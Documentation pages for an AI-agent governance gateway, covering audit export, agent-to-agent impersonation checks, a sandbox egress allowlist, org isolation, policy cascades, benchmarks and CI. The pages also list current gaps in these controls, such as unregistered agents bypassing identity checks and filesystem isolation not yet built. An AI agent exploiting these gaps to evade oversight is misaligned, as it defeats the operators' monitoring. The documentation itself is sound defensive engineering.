verify-chain consumes the raw on-disk file rather than the export, so the verifier sees exactly the bytes the gateway wrote. An auditor with the export and a SHA-256 implementation can independently re-hash each record’s canonical input (see the audit module documentation for the canonical bytes layout) and compare against the embedded entry_hash.

Security invariants

The export never carries raw credential values. credential_findings records only kind, offset, and the [REDACTED:<Kind>] label.
redacted_payload (when present) is the scanner’s substitution output, with raw secret bytes already replaced by [REDACTED:<Kind>] markers.
payload retains the original (pre-redaction) string only when the source entry did so; the gateway’s default policy is to replace payload with redacted_payload on persistence when findings exist, so by default the export carries no raw secret. Operators who pipe pre-redaction payloads downstream do so explicitly via configuration.

Last updated: 2026-05-25 by Chisanan232

Agent-to-Agent Identity (Zero-trust A2A)

Agent Assembly enforces a zero-trust posture on every agent-to-agent (A2A) tool dispatch: when agent A calls a tool exposed by agent B, the gateway verifies that the caller’s credentials match the claimed identity before any policy rule is evaluated. An impersonator (a third agent C presenting A’s agent_id with C’s own credential_token) is rejected at the front door and the attempt is recorded in the audit log.

How identity flows on an A2A call

agent A ── tool dispatch ──▶ agent B
                  │
                  ▼
         gateway PolicyService.CheckAction
                  │
                  ▼
   ┌───── validate_credential_token ─────┐
   │  registered token for agent_id      │
   │  matches the supplied token?        │
   └─────────────────┬───────────────────┘
                     │
        ┌────────────┴────────────┐
        ▼                         ▼
  Allow → evaluate policy   Reject → A2AImpersonationAttempted
                                    audit event + Deny response

agent_id in the request = the callee (the agent performing the action B).
caller_agent_id in the request = the originator (A).
credential_token is validated against the callee’s registered token — caller_agent_id is an attestation by the callee, not a credential.

Audit events

Two AuditEventType variants make A2A traffic explicit in the chain:

Variant	Emitted when	Payload fields
`A2ACallIntercepted`	Allow decision on a request whose `caller_agent_id` differs from `agent_id`.	`caller_agent_id`, `callee_agent_id`, plus the usual `action_type`, `decision`, `policy_rule`, `latency_us`.
`A2AImpersonationAttempted`	Pre-policy-eval rejection because `credential_token` is empty or does not match the registered token for the claimed `agent_id`.	`claimed_agent_id`, `credential_token_present` (bool), `reason`, `policy_rule = "a2a_identity_verification"`.

Single-agent calls (no caller_agent_id, or caller equals callee) keep emitting the existing ToolCallIntercepted / PolicyViolation variants — nothing changes for non-A2A traffic.

Rejection rules

The gateway rejects before policy evaluation when:

The claimed agent_id is registered AND the supplied credential_token is empty → Deny with reason "missing credential token".
The claimed agent_id is registered AND the supplied credential_token is non-empty but does not match the registered token → Deny with reason "credential token mismatch".

When the claimed agent is not registered, the gateway skips identity validation and lets the policy engine decide (this preserves the lightweight detection-slice fixtures that bypass the registry entirely). To opt into strict validation for a specific agent, register it via the AgentRegistry — that’s the activation gesture.

Operator visibility

Use the existing audit tooling to surface A2A activity:

# All A2A allows in the last hour
aasm audit list --since 1h --event-type A2ACallIntercepted

# Rejected impersonation attempts (security investigation)
aasm audit list --event-type A2AImpersonationAttempted

# Compliance export covering A2A traffic specifically
aasm audit compliance-export \
  --input      /var/lib/aa-gateway/audit/session-<hex>.jsonl \
  --event-type A2ACallIntercepted \
  --format     jsonl \
  --output-file ./a2a-traffic.jsonl

SDK expectations

When you build an A2A dispatch helper in your SDK, populate the CheckActionRequest like this:

Field	Set to
`agent_id`	The callee (the agent that will execute the tool).
`credential_token`	The callee’s registered token.
`caller_agent_id`	The originator of the dispatch, attested by the callee.

The Python / Node / Go SDKs ship A2A helpers that wrap this for you. For framework-level integrations that build CheckActionRequest directly, the new field is optional and proto3-additive — single-agent SDKs that don’t populate it continue working unchanged.

What does not change

Single-agent tool calls — no behavioural change, no new audit events.
The credential validation is scoped to registered agents — bypassing the registry continues to be the recommended path for in-process tests and CI fixtures that don’t model identity.
The policy engine — A2A enforcement is a pre-evaluation gate, not a new policy clause; existing rules still apply once the call passes identity validation.

Last updated: 2026-05-25 by Chisanan232

Tool Execution Sandbox — Network Egress

Agent Assembly’s Tool Execution Sandbox enforces a network allowlist on outbound traffic from sandboxed tools: when a tool tries to CONNECT to a host that is not on the allowlist, the proxy returns HTTP 403 before any upstream dial and emits an audit event recording the blocked egress. This is the network half of spec highlight ④ (Tool Execution Sandbox); the filesystem-isolation half is tracked under AAASM-1965.

Configuration

The allowlist is configured on the aa-proxy process via the AA_PROXY_NETWORK_ALLOWLIST environment variable. Comma-separated; empty means “no allowlist filter” (the pre-AAASM-1943 default-open posture is preserved when the variable is unset).

export AA_PROXY_NETWORK_ALLOWLIST='api.openai.com,*.anthropic.com,*.googleapis.com'
aa-proxy run

Equivalent policy-DSL form (operator-facing documentation; the proxy reads from the env var today, with policy-DSL → proxy-config sync tracked under the AAASM-1232 closeout matrix):

apiVersion: agent-assembly.dev/v1alpha1
kind: GovernancePolicy
metadata:
  name: prod-egress
  version: "1.0.0"
spec:
  network:
    allowlist:
      - api.openai.com
      - "*.anthropic.com"
      - "*.googleapis.com"

Pattern grammar

The same matcher (aa_core::policy::is_host_allowed_by_egress_allowlist) is used by the proxy enforcement path and the gateway policy DSL. The grammar is intentionally narrow:

Pattern	Matches	Does NOT match
`api.openai.com` (exact)	`api.openai.com` (case-insensitive)	`chat.openai.com`, `openai.com`, `attackerapi.openai.com`
`*.openai.com` (leftmost-label wildcard)	`api.openai.com`, `chat.openai.com`, `a.b.openai.com`	`openai.com` (bare), `evil.openai.com.attacker.net` (suffix attack)
`*` (universal — escape hatch)	every host	—

No mid-label *, no character classes, no full POSIX glob. Allowlist patterns that look more permissive than they are have historically been the source of egress-rule misconfigurations; the narrow grammar lets operators reason about every pattern at a glance.

The attacker-crafted-suffix case (evil.openai.com.attacker.net against *.openai.com) is a classic confusion attack: the attacker hopes a permissive glob would match. The narrow grammar rejects it.

Audit events

Both the allow and deny CONNECT paths emit PipelineEvent::Audit events on the proxy’s broadcast channel. The deny path additionally returns HTTP 403 Forbidden\r\nContent-Length: 0\r\n\r\n to the sandboxed tool, which sees a connection refusal at its language-level HTTP client.

Audit reviewers can correlate blocked-egress events to source tools via the existing aasm logs / aasm audit list tooling. The audit payload carries the target host so operators can spot patterns (e.g. a tool repeatedly trying to reach a c2 server).

# Recent denied CONNECT attempts
aasm logs --since 1h --grep "denied by network allowlist"

# Compliance export of all network-policy violations
aasm audit compliance-export \
  --input      /var/lib/aa-gateway/audit/session-<hex>.jsonl \
  --event-type PolicyViolation \
  --format     jsonl \
  --output-file ./network-violations.jsonl

What this does NOT cover (deferred to AAASM-1965)

This page documents the network-egress half of spec highlight ④. The filesystem-isolation half (“cat /etc/passwd from inside a sandboxed tool blocked / redacted”) requires a WASM/WASI sandbox runtime that doesn’t yet exist in the repo. Filed under AAASM-1965 as a Story-point-8 follow-up:

aa-wasm extended with wasmtime + WASI preview 1 host handlers.
ToolRegistry distinguishing WASM-runnable tools from native / shell tools.
Filesystem allowlist enforcement returning EACCES for paths outside the sandbox root.
E2E tests for the cat /etc/passwd denial path.

The ST-W ignored placeholder in aa-integration-tests/tests/e2e_tool_sandbox.rs::st_w_1_filesystem_isolation_for_sandboxed_tools contains the exact assertion plan the follow-up will fill in.

Last updated: 2026-05-25 by Chisanan232

Org-Tier Isolation (Multi-Tenancy)

Agent Assembly enforces a three-tier isolation hierarchy — Org / Team / Agent — so a single gateway can safely host workloads from multiple tenants. AAASM-1524 covers the Agent and Team tiers; this guide describes the Org tier added in AAASM-2008.

What the Org tier guarantees

When agents are registered with a non-empty proto.AgentId.org_id, the gateway enforces the following invariants:

Surface	Org-tier behaviour
Audit log	Every audit entry carries the originating agent’s `org_id` on `Lineage`. `GET /api/v1/logs?org_id=X` filters to a single tenant.
Topology	`GET /api/v1/topology/overview?org_id=X` returns only X’s agents. The registry maintains an `org_index` secondary index for O(members) lookup.
Credential validation	An agent registered in Org A presenting its valid token but claiming `agent_id.org_id = "B"` is rejected with `A2AImpersonationAttempted`. The registry’s credential reverse-index catches cross-org reuse before any policy evaluation.
Policy scope	A policy with `scope: org:<id>` cascades only for agents in that org. (Requires the multi-document loader from AAASM-2023 — partial today.)
Budget	Every Org owns an independent spend envelope on the `BudgetTracker.org_budgets` map. `record_cost` rolls each charge into the agent’s `org_id` and enforces `org_daily_limit_usd` / `org_monthly_limit_usd` set via policy YAML or the `with_org_*_limit` builders. Exhausting one Org’s envelope never affects another.

How to set up multi-tenancy

init_assembly(
    gateway="grpc://gateway:50051",
    agent_id={
        "org_id":   "acme",
        "team_id":  "platform",
        "agent_id": "research-bot-001",
    },
    credential_token=os.environ["AA_CREDENTIAL"],
)

The same convention applies via the Node and Go SDKs and via direct PolicyService.CheckAction calls — the proto AgentId triple is the canonical identity.

Querying by Org

Audit log

# Browser / curl
curl 'http://gateway/api/v1/logs?org_id=acme&per_page=50'

# Compliance export covering one org's audit trail
aasm audit compliance-export \
  --input      /var/lib/aa-gateway/audit/session-<hex>.jsonl \
  --org-id     acme \
  --format     jsonl \
  --output-file ./acme-audit.jsonl

Audit entries written before the agent was registered with an org_id (or by lightweight test fixtures that bypass the registry) carry org_id = None on Lineage and never match an explicit org_id filter. This is intentional — multi-tenancy isolation requires explicit Org tagging on the entry at write time.

Topology

curl 'http://gateway/api/v1/topology/overview?org_id=acme'

The overview endpoint scopes via AgentRegistry::org_members(oid). The other topology endpoints (tree, team, lineage, stats) accept the org_id query parameter but currently ignore it — the next ticket in the Org-tier rollout will wire each handler.

Cross-org credential reuse detection

When an agent in Org A presents its credential but claims agent_id.org_id = "B", the gateway:

Computes the registry key from the claimed {org_id, team_id, agent_id} triple. Because org_id is part of the hash, the claimed key differs from the agent’s actual registration key.
Looks up the claimed key — fails (no agent registered there).
Looks up the supplied credential_token in the reverse index — finds the actual owner.
Detects the mismatch, returns Deny with reason "credential token registered to a different agent", and emits an A2AImpersonationAttempted audit event with claimed_org_id in the payload.

A reviewer searching aasm audit list --event-type A2AImpersonationAttempted sees these attempts grouped by the org the attacker tried to claim.

Configuring Org-tier budget limits

Operator-facing knobs live in the budget: section of any Global-scoped policy document:

budget:
  daily_limit_usd:        10000.0   # global cap across all orgs
  monthly_limit_usd:      250000.0
  org_daily_limit_usd:    1000.0    # AAASM-2022 — per-org daily cap
  org_monthly_limit_usd:  25000.0   # AAASM-2022 — per-org monthly cap
  timezone: "UTC"
  action_on_exceed: deny

Semantics:

org_daily_limit_usd / org_monthly_limit_usd are uniform per-Org caps — the same envelope applies to every Org that records spend. Cross-Org isolation comes from the tracker maintaining an independent BudgetState per org_id, not from per-Org-customised limits.
Enforcement order in record_cost is global → org → team → agent, monthly checked before daily within each tier. The first tier that exceeds returns BudgetStatus::LimitExceeded and the deny is recorded.
Limits enter the tracker via with_org_daily_limit / with_org_monthly_limit builders during policy load. Restoring from persisted snapshot preserves limits via the same path — the org_budgets map is empty on first restore until the migration in AAASM-2022 follow-up lands.

Observing per-Org spend

#![allow(unused)]
fn main() {
// In-process accessor:
let alpha = budget.org_state("acme").map(|s| s.spent_usd);
}

The dashboard / CLI surfaces for aasm budget status --org <id> are queued under AAASM-1232 follow-up subtasks.

Known gaps

Org-scoped policy E2E: PolicyEngine::load_from_file doesn’t populate the scope_index, so scope: org:<id> policies need a multi-document loader — AAASM-2023.
Topology endpoints beyond overview: tree / team / lineage / stats accept the org_id query param but currently ignore it.
Persistence schema for Org-tier spend: the on-disk snapshot does not yet carry the org_budgets map; a restored tracker starts with empty Org state.

The headline scenarios — audit isolation, topology overview scoping, cross-org credential rejection (AAASM-2008), and cross-org budget envelope isolation (AAASM-2022) — ship complete.

Last updated: 2026-05-25 by Chisanan232

Multi-Document Policy Cascade

PolicyEngine::load_cascade_from_dir(dir) loads every *.yaml file in a directory and populates the gateway’s scope_index so each document cascades by its declared scope (Global / Org(<id>) / Team(<id>) / Agent(<id>)). This unlocks org-scoped, team-scoped, and agent-scoped policy rules in the runtime evaluation path — a capability that load_from_file (single-document) does not provide.

When to use

Multi-tenant deployments where each org needs its own deny/allow overrides on top of a Global baseline.
Team-level guardrails layered on top of the org’s rules (e.g. “platform team can use bash, but support cannot”).
Per-agent escape hatches for a single high-risk agent that needs a narrower allowlist than its team’s default.

Single-policy deployments should continue using load_from_file — the cascade adds zero value when there’s only one document.

Directory layout

policies/
├── 000-global-allow-all.yaml      # scope: global (or omitted)
├── 100-org-acme-deny-bash.yaml    # spec.scope: org:acme
├── 200-team-platform.yaml         # spec.scope: team:platform
└── 300-agent-research-bot.yaml    # spec.scope: agent:<UUID>

Filename prefixes are convention only — the loader sorts alphabetically so the cascade order is deterministic across filesystems. Use numeric prefixes to make precedence visually obvious.

Scope field placement (gotcha)

When using the envelope format (apiVersion / kind / metadata / spec), the scope: field MUST live inside spec:, not at the outer envelope level:

# CORRECT — scope inside spec
apiVersion: agent-assembly.dev/v1alpha1
kind: GovernancePolicy
metadata:
  name: org-acme-deny-bash
spec:
  scope: org:acme
  tools:
    bash:
      allow: false

# WRONG — scope at envelope level is SILENTLY IGNORED
apiVersion: agent-assembly.dev/v1alpha1
kind: GovernancePolicy
metadata:
  name: org-acme-deny-bash
scope: org:acme         # ← will be ignored; document defaults to Global
spec:
  tools:
    bash:
      allow: false

The validator’s envelope parser deserializes spec’s value as a RawPolicyDocument — outer-level keys outside the envelope frame are silently dropped. Always put scope: inside spec:.

How the cascade is collected

At evaluation time, the gateway walks scopes from broadest to narrowest for the calling agent’s lineage:

Global — every Global-scoped document.
Org — documents matching the agent’s lineage.org_id. The org is resolved from ctx.metadata["org_id"] (populated by the SDK’s proto AgentId.org_id).
Team — documents matching the agent’s lineage.team_id.
Agent — documents matching the agent’s lineage.agent_id.

Each level augments the cascade — Global rules still apply for agents in org-acme; the org-acme rules are added on top. The decision merger (merge_decisions) resolves conflicts with narrower scopes winning (Agent > Team > Org > Global).

How `org_id` flows from request to cascade

The cascade’s filtering by lineage.org_id works through two paths:

From request context — convert.rs::request_to_core deposits proto.org_id into ctx.metadata["org_id"]. PolicyEngine::evaluate reads this first and uses it as the lineage hint. This is the primary path.
From registry fallback — when ctx.metadata["org_id"] is empty (e.g. for traffic that doesn’t go through the SDK’s identity plumbing), the engine falls back to registry.lineage(agent_id).

The primary path is what makes scope: org:<id> work end-to-end: every SDK call that populates AgentId.org_id lands in the right org’s cascade automatically.

Programmatic loading

For tests or programmatic setups that don’t use a directory:

#![allow(unused)]
fn main() {
use aa_gateway::PolicyEngine;
use tokio::sync::broadcast;

let (alert_tx, _) = broadcast::channel(64);
let engine = PolicyEngine::load_cascade_from_dir(
    std::path::Path::new("/etc/aa-gateway/policies/"),
    alert_tx,
)?;
}

The loader returns the same PolicyEngine type as load_from_file, so it drops into existing service wiring without code changes.

Caveats

No filesystem watcher — the cascade is static at load. Hot-reload across multiple files is a separate concern; restart the gateway to pick up changes.
First Global doc supplies budget config — alphabetical order determines which Global document’s budget: block sets daily / monthly limits and data.sensitive_patterns. If two Global docs disagree on budget, the alphabetically-first one wins.
Parse failures abort the whole load — partial loads would be a worse failure mode than the loud abort; the caller gets a PolicyParseError for the first bad file.

AAASM-2008 — Org-tier isolation (closes the audit / topology / credential surfaces; deferred the policy-scope half to this ticket).
aa-gateway/tests/cascade_merge_test.rs — pure-logic unit tests of the cascade evaluator (independent of the loader).
aa-integration-tests/tests/e2e_org_isolation.rs::st_org_4_* — the E2E test that exercises this loader against a real gateway.

Last updated: 2026-05-25 by Chisanan232

Releases

This page tells you where to find a published build, which channels it ships to, and how the release is cut.

agent-assembly is in the v0.0.1 alpha pre-release series. The public API and wire protocol are not yet stable.

Warning: every published tag is a pre-release. Do not run v0.0.1-alpha.* in production — the wire protocol can change between alphas.

Where releases live

GitHub Releases: https://github.com/ai-agent-assembly/agent-assembly/releases — the source of truth for published tags and changelogs. The latest tag is a pre-release (v0.0.1-beta.2, 2026-06-15).
Per-tag notes: the source-controlled release notes live under docs/release/ (one file per tag, e.g. docs/release/v0.0.1-beta.2.md).
Top-level changelog: CHANGELOG.md.

Distribution channels

A single coordinated tag push fans out to every channel:

Channel	Artifact
GitHub Releases	`aasm-*.tar.gz` binaries + `SHA256SUMS`
crates.io	Workspace crates at the tag version
Homebrew tap	`aasm` formula (`homebrew-agent-assembly`)
PyPI / npm	SDK packages
GHCR	Container image

Release process

The mechanics (version bump, tag, changelog, multi-channel publish) are driven by the automated release workflow. Operators follow the pre-tag checklist in the release runbook at docs/release/RUNBOOK.md. See also the Versioning Policy and Compatibility Matrix.

Last updated: 2026-06-15 by Chisanan232

Performance Benchmark Baseline

Baseline results recorded on 2026-04-29. Machine: Apple M-series (arm64), macOS Darwin 25.2.0.

All benchmarks run with cargo bench in release profile.

SDK Hook Overhead (`aa-ffi-python`)

Target: < 2 ms P99 per LLM call (AAASM-34 AC #6).

Benchmark	Mean	Low	High
`report_llm_call_channel`	237 ns	229 ns	245 ns

Verdict: PASS — 3 orders of magnitude below the 2 ms target.

Note (AAASM-2562): the aa-ffi-python SDK-hook benchmark (sdk_bench) moved to the python-sdk repo when the fat binding left this workspace — run it there with cargo bench --bench sdk_bench. The numbers above are retained as the historical 2026-04-29 baseline.

Proxy Intercept Latency (`aa-proxy`)

Target: < 5 ms P99 per intercepted request (AAASM-36 AC #5).

Benchmark	Mean	Low	High
`intercept/openai_response`	2.74 us	2.74 us	2.75 us
`intercept/openai_with_credential_redaction`	3.82 us	3.79 us	3.86 us

Verdict: PASS — both variants well below the 5 ms target. Credential redaction adds ~1 us overhead.

Gateway Policy Check (`aa-gateway`)

Benchmark	Mean	Low	High
`check_action_rpc/round_trip/minimal_llm_call`	79.6 us	78.8 us	80.5 us
`check_action_rpc/round_trip/full_tool_call_1kb`	79.6 us	78.3 us	80.9 us
`check_action_rpc/round_trip/worst_case_network`	76.3 us	75.6 us	76.9 us

Credential Scanner Throughput (`aa-core`)

Benchmark	Mean	Throughput
`scanner/scan_1mb_payload`	6.31 ms	~159 MB/s

Comparing Against Baseline

Run cargo bench to generate HTML reports in target/criterion/. Each benchmark group produces a report/index.html with historical comparison charts when prior runs exist.

To compare against this baseline:

Run cargo bench on the baseline commit to populate target/criterion/.
Run cargo bench on the new commit — Criterion auto-compares and reports percentage change with statistical significance.

Last updated: 2026-06-06 by Chisanan232

Build-Time Baseline

Before/after harness for Epic AAASM-2551 (Rust build & compile-time performance). This page records the build-time baseline established by Story AAASM-2557 so the profile (AAASM-2553), dev/linker (AAASM-2554), dependency-dedup (AAASM-2555), and CI (AAASM-2556) Stories can each quote a measured before/after against the same harness.

This is distinct from Baseline, which records runtime (cargo bench) numbers. This page measures how long the workspace takes to compile, not how fast it runs.

Harness

Run the full capture with:

make build-baseline          # wraps scripts/build-baseline.sh
# or
bash scripts/build-baseline.sh

The harness records four measurements and archives the raw outputs (logs, the cargo build --timings HTML, the top-crate extraction, and the cargo tree -d report) under target/build-baseline/ (gitignored):

#	Measurement	Command
1	Cold build	`cargo clean` then `cargo build --workspace --timings`
2	Warm rebuild	`touch aa-cli/src/main.rs` then `cargo build --workspace`
3	Test build	`cargo nextest run --workspace --no-run` (compile only)
4	Duplicate deps	`cargo tree -d`

Measurement 3 deliberately compiles the test binaries without running them: the build-time signal the profile/linker/dedup Stories move is the compile cost, whereas the full suite’s run wall-clock is dominated by Docker-backed integration tests and is sensitive to timing flakes. Set BUILD_BASELINE_RUN_TESTS=1 to additionally run the full suite (--no-fail-fast) and record its build+run wall-clock.

Why `aa-ebpf` is excluded

aa-ebpf requires a nightly toolchain plus bpf-linker, so the workspace’s own make build-workspace and make test targets build with --exclude aa-ebpf. The baseline mirrors that to measure the build path developers and the non-eBPF CI jobs actually hit. Pass BUILD_BASELINE_INCLUDE_EBPF=1 to include it on a nightly-capable host. Other tunables: BUILD_BASELINE_WARM_FILE, BUILD_BASELINE_TOP_N, BUILD_BASELINE_OUT (see the script header).

Reproducibility notes

Wall-clock is whole-second resolution from the shell; expect a few percent run-to-run variance, especially for the link-bound warm rebuild.
Numbers are machine-specific. Always compare a before/after pair captured on the same machine — never an absolute number against a different host.
The third-party registry cache (~/.cargo) is shared, so the cold build measures compile + link time, not crate download time.

Recorded baseline

Captured 2026-06-05 on Apple M-series (arm64, 16 logical CPUs, 128 GB), macOS Darwin 25.4.0, cargo 1.95.0, cargo-nextest 0.9.133, default [profile.dev] and [profile.release] (i.e. the pre-Epic configuration).

Measurement	Wall-clock
Cold build (`cargo build --workspace --timings`)	124 s
Warm rebuild (touch `aa-cli/src/main.rs`, relink)	5 s
Test build (`cargo nextest run --workspace --no-run`)	396 s
Packages built in >1 version (`cargo tree -d`)	34
Distinct duplicate `(name, version)` build units	105

Local wall-clock is noisy: across three runs the cold build measured 91–211 s on this machine (background load / thermal). Treat these as the local order-of-magnitude; the Epic’s per-Story before/after pairs must be captured on the same idle machine, and CI numbers are authoritative.

Top longest-compiling crates

From the archived cargo build --timings HTML (target/build-baseline/cargo-timing.html), summing each crate’s units (build-script + lib + codegen):

Rank	Compile (s)	Crate
1	63.6	`aws-lc-sys` 0.40.0
2	35.2	`wasmtime` 45.0.0
3	33.7	`cranelift-codegen` 0.132.0
4	29.8	`rustls` 0.23.40
5	25.3	`object` 0.39.1
6	25.2	`libsqlite3-sys` 0.30.1
7	23.1	`asn1-rs` 0.7.1
8	22.9	`thiserror` 1.0.69
9	21.0	`rustix` 1.1.4
10	21.0	`wasmtime-internal-jit-debug` 45.0.0

The long poles are the WebAssembly stack (wasmtime, cranelift-codegen, wasmtime-internal-jit-debug — pulled by aa-wasm) and crypto/TLS (aws-lc-sys, rustls), confirming the Epic’s hypothesis. Per-crate seconds shift run-to-run with build parallelism, but this set is stable.

Duplicate dependencies (dedup baseline for AAASM-2555)

cargo tree -d reports 34 packages built in more than one version (105 distinct (name, version) units). The worst offenders:

Versions	Package
4	`hashbrown`
3	`rand`, `rand_core`, `getrandom`
2	`winnow`, `webpki-roots`, `wast`, `wasm-encoder`, `untrusted`, `toml`, `toml_datetime`, `thiserror-impl`, …

The complete set of multi-version packages — the committed dedup baseline for AAASM-2555 to diff against — follows. The full cargo tree -d report (with the inverted dependent trees) is also archived at target/build-baseline/cargo-tree-dups.txt for the dependency paths.

block-buffer        v0.10.4  v0.12.0
const-oid           v0.9.6   v0.10.2
convert_case        v0.10.0  v0.11.0
cpufeatures         v0.2.17  v0.3.0
crypto-common       v0.1.7   v0.2.1
deadpool            v0.12.3  v0.13.0
deadpool-runtime    v0.1.4   v0.3.1
digest              v0.10.7  v0.11.3
fixedbitset         v0.4.2   v0.5.7
foldhash            v0.1.5   v0.2.0
getrandom           v0.2.17  v0.3.4   v0.4.2
hashbrown           v0.14.5  v0.15.5  v0.16.1  v0.17.1
hashlink            v0.9.1   v0.10.0
hmac                v0.12.1  v0.13.0
itertools           v0.13.0  v0.14.0
lru                 v0.16.4  v0.18.0
petgraph            v0.6.5   v0.8.3
phf                 v0.11.3  v0.12.1
phf_shared          v0.11.3  v0.12.1
rand                v0.8.6   v0.9.4   v0.10.1
rand_chacha         v0.3.1   v0.9.0
rand_core           v0.6.4   v0.9.5   v0.10.1
reqwest             v0.12.28 v0.13.3
sha2                v0.10.9  v0.11.0
similar             v2.7.0   v3.1.1
thiserror           v1.0.69  v2.0.18
thiserror-impl      v1.0.69  v2.0.18
toml                v0.9.12  v1.1.2
toml_datetime       v0.7.5   v1.1.1
untrusted           v0.7.1   v0.9.0
wasm-encoder        v0.248.0 v0.251.0
wast                v35.0.2  v251.0.0
webpki-roots        v0.26.11 v1.0.7
winnow              v0.7.15  v1.0.2

AAASM-2555 should re-run cargo tree -d after centralizing [workspace.dependencies] and confirm this count drops.

Full test build+run (context)

The default harness records test compile time only, because the full suite’s run wall-clock is dominated by integration-test execution rather than the build. For reference, one BUILD_BASELINE_RUN_TESTS=1 capture on the same machine measured 3452 s end-to-end build+run — of which the run phase was Summary [2546 s] 3764 tests run: 3744 passed (228 slow, 4 leaky), 20 failed. The 20 failures are local timing-sensitive integration assertions (e.g. the aa-api L1-invalidation 100 ms check) and do not affect compile time. This number is here for completeness; the profile/linker/dedup Stories should be judged against the compile rows above, not this run-dominated figure.

Acceptance-criteria mapping (AAASM-2557)

Acceptance criterion	Evidence
Baseline numbers for cold build, warm rebuild, and test build+run recorded	“Recorded baseline” → wall-clock table (cold/warm/test-build) + “Full test build+run (context)”
`cargo build --timings` HTML identifies the top 5 longest-compiling crates	“Top longest-compiling crates” table (`target/build-baseline/cargo-timing.html`)
`cargo tree -d` attached as the dedup baseline for AAASM-2555	“Duplicate dependencies” table (`target/build-baseline/cargo-tree-dups.txt`)

Last updated: 2026-06-05 by Chisanan232

PolicyService CheckAction RPC — Latency Benchmark Results

Environment

Parameter	Value
CPU	Apple M3 Max
Memory	128 GB
OS	macOS 26.2 (Darwin)
Rust	1.95.0 (2026-04-14)
Tonic	0.13.1
Transport	TCP loopback (127.0.0.1)
Profile	`--release` (optimized)

SLA Target

p99 < 5ms end-to-end round-trip (serialize + transport + evaluate + respond).

Criterion Micro-Benchmarks

Reused TCP connection, single client, 100 samples per variant.

Payload Variant	Description	Mean	Std Dev
`minimal_llm_call`	`LlmCallContext`, no PII	77.9 us	~1 us
`full_tool_call_1kb`	`ToolCallContext`, ~1KB `args_json`	82.2 us	~1 us
`worst_case_network`	`NetworkCallContext`, long URL (~400 bytes)	81.9 us	~1 us

Sustained Load Test (60 seconds)

1,000 req/sec sustained for 60 seconds, 10 concurrent clients, ToolCallContext payload.

Metric	Value	vs SLA
Total requests	60,000
Actual RPS	999
p50	144 us	34x headroom
p95	357 us	14x headroom
p99	803 us	6.2x headroom
p999	2.65 ms	1.9x headroom
max	10.89 ms

Verdict

PASS — p99 latency of 803 us is well under the 5ms SLA target with 6.2x headroom.

The max latency (10.89 ms) exceeds 5ms but this is expected for a single outlier in 60,000 requests on a non-isolated workstation. The p999 (2.65 ms) confirms the tail is well-bounded for all practical purposes.

Last updated: 2026-05-04 by Chisanan232

CI/CD Pipeline Performance

Before/after record of the CI/CD workflow redesign delivered under Epic AAASM-2551 (Rust build & compile-time performance — local + CI). This page documents what changed and why, and quotes real GitHub Actions run data proving the speed-up.

This is distinct from Build-Time Baseline, which measures how long the workspace takes to compile. This page measures how long the CI pipeline takes end-to-end per change, and how much runner compute it consumes.

The problem (before)

ci.yml had ~30 jobs gated by a binary changes router (dorny/paths-filter emitting only rust / dashboard / ebpf). Any edit under aa-*/** set rust == true, which fanned out to ~22 Rust jobs regardless of which sub-area changed — including the expensive ones that are almost never relevant to a given change: the eBPF nightly build + sudo e2e, the proto breaking-check, the OpenAPI drift + Spectral lint, the schema lint, the TimescaleDB and migration-drift testcontainer jobs, full llvm-cov coverage, SonarCloud, and the criterion benchmark. There was also no aggregate gate job, and the aa-integration-tests suite ran twice on Linux.

The result: a one-line dependency bump paid for nearly the entire matrix.

What changed

Story	Change
AAASM-2598	Per-workflow `concurrency` groups; `cancel-in-progress` gated to `pull_request` (superseded PR runs are cancelled; pushes/releases never are).
AAASM-2599	Fine-grained `changes` router — added `proto` / `schema` / `openapi` / `storage` outputs (each a strict subset of `rust`) and re-gated the single-purpose validators onto them. Added a single `CI Success` aggregate gate (`needs` every functional job, `if: always()`, fails on any `failure`/`cancelled`; `coverage`/`sonar` excluded as advisory).
AAASM-2600	Docker / FFI images build PR-light (one arch, `is_latest` only) on PRs; full multi-arch + push only on `v*` tags.
AAASM-2601	Relocated `Coverage` / `SonarCloud` / `Benchmark` behind `push`-or-label gates — they no longer run on every PR.
AAASM-2611	Least-privilege `permissions: contents: read` at the top of every workflow; write elevated per-job only where needed.
AAASM-2628	Closed a trigger-path gap — `schemas/` (and `openapi/`) were missing from `ci.yml`’s `on.*.paths`, so schema-only changes never ran `schema-lint`.
AAASM-2631	Dropped the redundant Linux `aa-integration-tests` run — it already runs in `ci.yml`’s `test` job; the dedicated workflow is now macOS-only.

The mechanism: a typical change now runs the always-on fast gate (build, fmt, clippy, rustdoc, test, deny, no-std, conformance) plus only the area(s) it actually touched. Everything else skips, and a single CI Success status summarises the run.

Measured results (real GitHub Actions runs)

Apples-to-apples: the identical dependency-bump PR, before and after

The same dependabot/cargo/master/async-nats-0.49.1 PR was re-run before and after the redesign — same diff, same content:

Metric	Before — run #2179 (2026-06-04)	After — run #2283 (2026-06-06)	Δ
Jobs executed	23 of 30	16 of 32	−7 jobs
Runner-minutes (Σ job durations)	64.0	17.3	−73 %
Wall-clock	71.1 min	10.0 min	−86 % (7.1× faster)

Because async-nats is a transitive cargo bump that touches no proto / schema / OpenAPI / storage / eBPF / dashboard code, the after-run correctly skips Benchmark, Coverage, SonarCloud, Migration drift check, TimescaleDB Tests, Proto lint & breaking check (buf), Schema lint, OpenAPI drift, OpenAPI lint, and both eBPF jobs — none of which it can affect.

Dashboard-only PR

A dashboard dependency bump now runs only the dashboard jobs:

	Before — run #2180	After — run #2288
Jobs executed	full dashboard + rust fan-out	7 of 31 (24 skipped — every Rust job)
Wall-clock	55.2 min	10.4 min

Master push (full coverage, incl. `Coverage` + `SonarCloud`)

Pushes still run the acceptance jobs (Coverage/Sonar are push-gated), yet still benefit from area-routing, concurrency cancellation, and the shared dashboard-assets artifact:

	Before — run #2200	After — run #2292
Runner-minutes	80.8	44.1
Wall-clock	132 min	29 min

Methodology & caveats

Data was pulled from the GitHub Actions REST API (/repos/.../actions/runs/<id>/jobs). Runner-minutes = the sum of each non-skipped job’s completed_at − started_at. Wall-clock = the run’s updated_at − run_started_at.
Runner-minutes and job-count are deterministic measures of work performed. Wall-clock carries cache-warmth and runner-availability noise (a cold Swatinem/rust-cache or a busy runner pool inflates it), so treat the wall-clock figures as illustrative and the runner-minute / job-count figures as the load-bearing evidence.
Run numbers are cited so each row can be re-inspected: gh api repos/ai-agent-assembly/agent-assembly/actions/runs/<id>/jobs.

Takeaway

For the common case — a focused change or a dependency bump — the pipeline does ~75 % less work and returns a result ~7× sooner, while a single CI Success gate still guarantees nothing necessary was skipped: every functional job is a dependency of the gate, and each area’s validators run whenever their own inputs change.

